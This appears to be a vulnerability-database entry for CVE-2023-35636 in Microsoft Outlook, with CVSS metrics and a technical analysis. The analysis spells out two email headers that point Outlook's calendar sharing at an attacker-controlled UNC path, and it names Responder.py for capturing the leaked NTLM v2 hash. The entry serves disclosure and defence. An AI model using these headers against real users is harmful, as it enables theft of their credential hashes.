Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
2

CVE-2023-35636

Disclosure Date: December 12, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Credential Access
Techniques
Validation
Validated

Description

Microsoft Outlook Information Disclosure Vulnerability

Add Assessment

2
Ratings
Technical Analysis

Discovered by Dolev Taler from the Varonis Threat Labs team, CVE-2023-35636 is an exploit of the calendar-sharing function in Microsoft Outlook, whereby adding two headers to an email directs Outlook to share content and contact a designated machine, creating an opportunity to intercept an NTLM v2 hash.

  1. An attacker crafts an email invite to the victim, pointing the “.ICS” file path to the attacker-controlled machine. By “listening” to a self-controlled path (domain, IP, folder path, UNC, etc.), the threat actor can obtain connection attempt packets that contain the hash used to access this resource. Many tools are used to perform this listening, and in the example above, Responder.py was used (the go-to tool for every SMB and NTLM hash attack).
  2. If the victim clicks on the “Open this iCal” button inside the message, their machine will attempt to retrieve the configuration file on the attacker’s machine, exposing the victim’s NTLM hash during authentication.

Exploited headers:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

  1. “Content-Class” = “Sharing” — This tells Outlook that this email contains sharing content.
  2. “x-sharing-config-url” = \(Attacker machine)\a.ics — The second line points the victim’s Outlook to the attacker’s machine.

Usually, NTLM v2 should be used when attempting to authenticate against internal IP-address-based services. However, when the NTLM v2 hash is passing through the open internet, it is vulnerable to relay and offline brute-force attacks.

CVSS V3 Severity and Metrics
Base Score:
6.5 Medium
Impact Score:
3.6
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • microsoft

Products

  • 365 apps -,
  • office 2016,
  • office 2019,
  • office long term servicing channel 2021

Additional Info

Technical Analysis